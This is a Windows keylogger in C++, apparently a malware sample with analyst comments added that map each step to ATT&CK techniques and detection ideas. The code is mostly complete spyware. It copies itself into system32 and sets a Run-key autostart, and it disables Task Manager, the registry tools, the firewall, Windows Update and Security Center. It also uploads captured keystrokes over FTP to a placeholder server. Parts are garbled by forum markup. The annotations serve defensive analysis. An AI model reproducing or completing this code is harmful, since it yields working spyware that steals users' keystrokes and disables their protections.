// Analyst annotation (defensive reading of a keylogger sample).
// The visible code, in order: copies itself into the system directory, adds a
// Run-key autostart value, sets policy values that disable Task Manager and
// registry tools, drops batch files that stop and disable security-related
// services, writes an FTP command script that sends the keystroke log, then
// polls the keyboard forever and appends to C:\WINDOWS\system32\log.txt.
// No API return value is checked anywhere in this function.
// The listing is not self-contained: `params`, `OpenBatFile`, `GetKey` and all
// #include lines are outside the visible code.
// Every write below targets HKLM or %SystemRoot%\system32, which needs
// administrative rights; a standard-user token blocks most of these steps.
// ATT&CK techniques matching the visible behaviour: T1547.001, T1112,
// T1562.001, T1562.004, T1056.001, T1048.003.
int main()
{
// Local declaration of WinMain only; nothing in the visible code calls it.
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil);
// Resolve the path of the running executable and the system directory.
char path[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
char sys[MAX_PATH];
GetModuleFileName(GetModH, path, sizeof(path));
GetSystemDirectory(sys, sizeof(sys));
// NOTE(review): the literal below carries forum [URL] markup (extraction
// artifact), so this line is not valid C++ as listed. The file name visible in
// it is borg.exe, appended to the system directory path.
strcat(sys, "[URL="file://\\borg.exe"]\\borg.exe[/URL]");
// Self-copy to the path built above; `false` allows overwriting an existing file.
// Detection: an executable copying its own image into the system directory.
CopyFile(path, sys, false);
HKEY hKey, hKey2;
unsigned char reg[2] = "0";
// Persistence (T1547.001): value "MS-Windows-secretly" under HKLM\...\Run points
// at the copied file. Detection: registry auditing / Sysmon registry-set events
// on the Run key, especially values referencing files in the system directory.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));
// Defense impairment (T1562.001): sets the per-user DisableTaskMgr policy value
// from the 2-byte `reg` buffer. Any write to this value outside Group Policy
// is worth alerting on.
RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);
RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));
// Comma expression: only hKey is passed to RegCloseKey; `(hKey2)` is evaluated
// and discarded, so that handle stays open.
RegCloseKey(hKey),(hKey2);
// Removes any earlier keystroke log before a new one is started.
DeleteFile("C:\\WINDOWS\\system32\\log.txt");
// Dropped file 1: C:\WINDOWS\system32\update.bat (T1562.001 / T1562.004).
// The script stops the "Security Center" and SharedAccess services, builds
// %Temp%.\kill.reg setting Start=dword:00000004 (service disabled) for
// SharedAccess, wuauserv and wscsvc, imports it silently with REGEDIT /S, then
// deletes the .reg file and itself (DEL %0).
// Detection: `net stop` of these services, regedit.exe /S launched from a batch
// file, and Start value changes under ...\Services\{SharedAccess,wuauserv,wscsvc}.
ofstream FWUP;
FWUP.open("C:\\WINDOWS\\system32\\update.bat");
FWUP<<"@echo off\n";
FWUP<<"net stop ""Security Center""\n";
FWUP<<"net stop SharedAccess\n";
FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n";
FWUP<<"DEL ""%Temp%.\\kill.reg""\n";
FWUP<<"DEL %0\n";
FWUP.close();
// Dropped file 2: C:\WINDOWS\system32\syssvr.bat. Runs `reg add` to set the
// disableregistrytools policy value to 1 under HKCU.
// NOTE(review): the key path as listed contains a stray '?' ("Syste?m"),
// probably an extraction artifact; hunt on the value name rather than the
// exact path string.
ofstream disable;
disable.open("C:\\WINDOWS\\system32\\syssvr.bat");
disable<<"@echo off\n";
disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Syste?m"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";
disable.close();
//write ur ftp-information's here
// Dropped file 3: an FTP command script stored as
// C:\WINDOWS\system32\drivers\config.sys, a name that resembles a system file.
// "ftpserver", "username" and "ftppassword" are the author's placeholders. The
// script sends log.txt and holds the credentials in clear text, so a recovered
// copy identifies the collection server and account.
ofstream log;
log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");
log<<"OPEN ftpserver\n";
log<<"USER username\n";
log<<"ftppassword\n";
log<<"ASCII\n";
log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";
log<<"BYE\n";
log<<"exit\n";
log.close();
// Dropped file 4: C:\WINDOWS\system32\system.bat, which runs ftp.exe with the
// script above (T1048.003, exfiltration over unencrypted FTP).
// Detection: ftp.exe started with -s:<file> by cmd.exe, and outbound TCP/21
// from workstations that have no business need for FTP.
ofstream Ausgabe;
Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");
Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";
Ausgabe<<"bye\n";
Ausgabe<<"exit\n";
Ausgabe.close();
// Runs the two tamper scripts with hidden windows (SW_HIDE). `params` is not
// declared in the visible code.
ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\syssvr.bat", params, NULL, SW_HIDE);
ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\update.bat", params, NULL, SW_HIDE);
// Starts a background thread on OpenBatFile, which is not defined in the
// visible code. Presumably it launches system.bat (the upload step); confirm
// against the full sample.
DWORD OpenBatch;
HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);
// Keystroke log: opened in append mode at a fixed path, a stable file IoC.
std::string Filename = "C:\\WINDOWS\\system32\\log.txt";
std::string TempString = "";
std::fstream FStream;
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
// Capture loop (T1056.001): never exits; polls virtual-key codes 8..190.
// Detection: a windowless process calling GetAsyncKeyState at high frequency
// across the whole key range while repeatedly reopening one file for append.
while(true)
{
// 0% CPU
// The 5 ms sleep between polling passes keeps CPU use low.
Sleep(5);
for(int i = 8; i < 191; i++)
{
// `==` binds tighter than `&`, so this evaluates GetAsyncKeyState(i) & (1 == 1),
// i.e. it tests the low-order bit of the returned state.
if(GetAsyncKeyState(i)&1 ==1)
{
// GetKey is defined outside the visible code; its result is appended to the log.
// The stream is closed and reopened after every write, so each captured key
// is on disk immediately.
TempString = GetKey (i);
FStream.write(TempString.c_str(), TempString.size());
FStream.close();
FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
}
}
}
}